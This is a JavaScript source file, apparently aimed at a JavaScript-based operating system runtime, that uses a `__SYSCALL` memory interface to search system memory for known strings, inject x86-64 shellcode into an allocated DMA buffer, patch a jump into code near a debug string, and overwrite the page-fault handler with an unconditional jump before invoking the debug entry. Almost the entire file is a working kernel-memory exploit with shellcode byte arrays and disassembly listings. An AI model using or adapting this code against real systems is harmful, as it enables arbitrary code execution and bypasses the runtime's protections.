// Startup marker; nothing else is printed until the first memory search completes.
console.log("Starting");
// Scans a window of system memory for the byte sequence `lookFor` and returns
// the absolute address of the first match, or null if there is none.
//
// Depends on the runtime global `__SYSCALL` (not defined in this file). A
// runtime that hands scripts `memoryRange.block(...).buffer()` is giving them
// an unrestricted read view of memory, which is what this search relies on;
// restricting or removing that surface is what would defeat it.
//
// lookFor: array of byte values to match in order.
// Returns: number (match index plus MEM_START_OFFSET), or null.
function findData(lookFor) {
  var MEM_START_OFFSET = 1;
  // A 0x7FFFFFFF-byte block is requested, but only the first 0x2000000
  // (32 MiB) offsets are used as match starts below.
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer());
  var locs = []; // unused
  for (var i = 0; i < 0x2000000; i++) {
    var found = true;
    for (var j = 0; j < lookFor.length; j++) {
      // Reading past the view yields undefined, which compares unequal and
      // simply fails the match; no bounds error is raised.
      if (memBuffer[i+j] != lookFor[j]) {
        found = false;
        break;
      }
    }
    if (found) {
      return (i + MEM_START_OFFSET);
    }
  }
  return null;
}
/**
 * Formats a byte value as two lowercase hex digits ("0a", "ff").
 * Values above 0xff are rendered unpadded ("100") and negative values keep
 * their sign ("-1"), exactly as Number#toString(16) produces them.
 * @param {number} d - value to format
 * @returns {string} zero-padded hex string
 */
function decToHex(d) {
  return d.toString(16).padStart(2, "0");
}
// Returns `size` bytes of system memory starting at `start` as a hex string
// (two digits per byte, no separators). Not called anywhere in this file;
// it is a debugging aid over the same `__SYSCALL` memory view used elsewhere.
//
// start: address passed to memoryRange.block.
// size:  number of bytes to read and format.
// Returns: string of length 2 * size.
function dumpMem(start, size) {
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer());
  var outStr = "";
  for (var i = 0; i < size; i++) {
    outStr += decToHex(memBuffer[i]);
  }
  return outStr;
}
// Copies `data` byte-for-byte into a Uint8Array view over the memory block at
// `writeTo`. The script relies on this view writing through to the underlying
// memory (not shown in this file; presumably true of `memoryRange.block`).
// Exposing such a view to scripts is a write primitive to arbitrary
// addresses, which is the capability the rest of this file builds on.
//
// writeTo: destination address.
// data:    array of byte values; data.length bytes are written.
// Returns: nothing.
function writeData(writeTo, data) {
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer());
  for (var i = 0; i < data.length; i++) {
    memBuffer[i] = data[i];
  }
}
/**
 * Writes each chunk of `datas` back-to-back starting at `writeTo`, advancing
 * the destination by the length of the chunk just written. Delegates every
 * chunk to writeData.
 * @param {number} writeTo - address of the first chunk
 * @param {number[][]} datas - byte arrays to write in order
 */
function writeMultipleData(writeTo, datas) {
  var cursor = writeTo;
  for (var k = 0; k < datas.length; k++) {
    var chunk = datas[k];
    writeData(cursor, chunk);
    cursor += chunk.length;
  }
}
/**
 * Splits the low 32 bits of `pointer` into four little-endian bytes.
 * Bits above 32 are discarded by the shift's 32-bit truncation, so the
 * encoding is only faithful for values below 2^32.
 * @param {number} pointer - address to encode
 * @returns {number[]} [b0, b1, b2, b3], least significant byte first
 */
function pointerToBytes(pointer) {
  return Array.from({ length: 4 }, (_, byteIndex) => (pointer >>> (byteIndex * 8)) & 0xff);
}
// Entry point. Everything below depends on the `__SYSCALL` global (not
// defined in this file) exposing `getSystemResources().memoryRange.block`,
// `allocDMA` and `debug`. Each step locates a known string in memory, then a
// 32-bit reference to it, and overwrites bytes at a fixed displacement from
// that reference; the displacements (-5, +4, -251) are target-specific and
// not derivable from this file. The comments above each byte array give the
// x86-64 disassembly of those bytes, with the address immediates filled in by
// pointerToBytes at run time.
//
// Note: findData returns null when a pattern is absent, so each
// `.toString(16)` on a search result would throw a TypeError instead of
// reporting the failed search.
var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0)));
console.log("Found debug string at: ", dbgStrAddr.toString(16));
// Second search: the little-endian encoding of the address found above,
// i.e. a location that references the string.
var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr));
console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16));
// allocDMA is called without arguments; only `.address` of the result is used.
var codeBuf = __SYSCALL.allocDMA();
console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16));
/*
0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000
7: ff e3 jmp rbx
*/
// The 0x1ce00000 immediate in the listing is an example; the real value is
// codeBuf.address, inserted as the middle chunk.
var jmpData = [
  [0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address),
  [0xff, 0xe3]
];
writeMultipleData(dbgStrUsageAddr - 5, jmpData);
/*
0: 48 83 c4 08 add rsp,0x8
4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef
b: 00 00 00
e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678
15: ff e3 jmp rbx
*/
// Likewise, 0x12345678 in the listing stands for dbgStrUsageAddr + 4.
var shellcode = [
  [0x48, 0x83, 0xc4, 0x08],
  [0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00],
  [0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4),
  [0xff, 0xe3]
];
writeMultipleData(codeBuf.address, shellcode);
var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0)));
console.log("Found page fault string at: ", invalidStrAddr.toString(16));
var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr));
console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16));
// Set unconditional jump in page fault handler
// Single-byte write; the -251 displacement is taken on faith from the author.
writeData(invalidStrUsageAddr - 251, [0xEB]);
console.log("Finished writing shellcode");
// Triggers whatever the runtime's debug entry does; the patched bytes above
// are expected to take effect here. No result is checked.
__SYSCALL.debug();
console.log("Finished calling debug");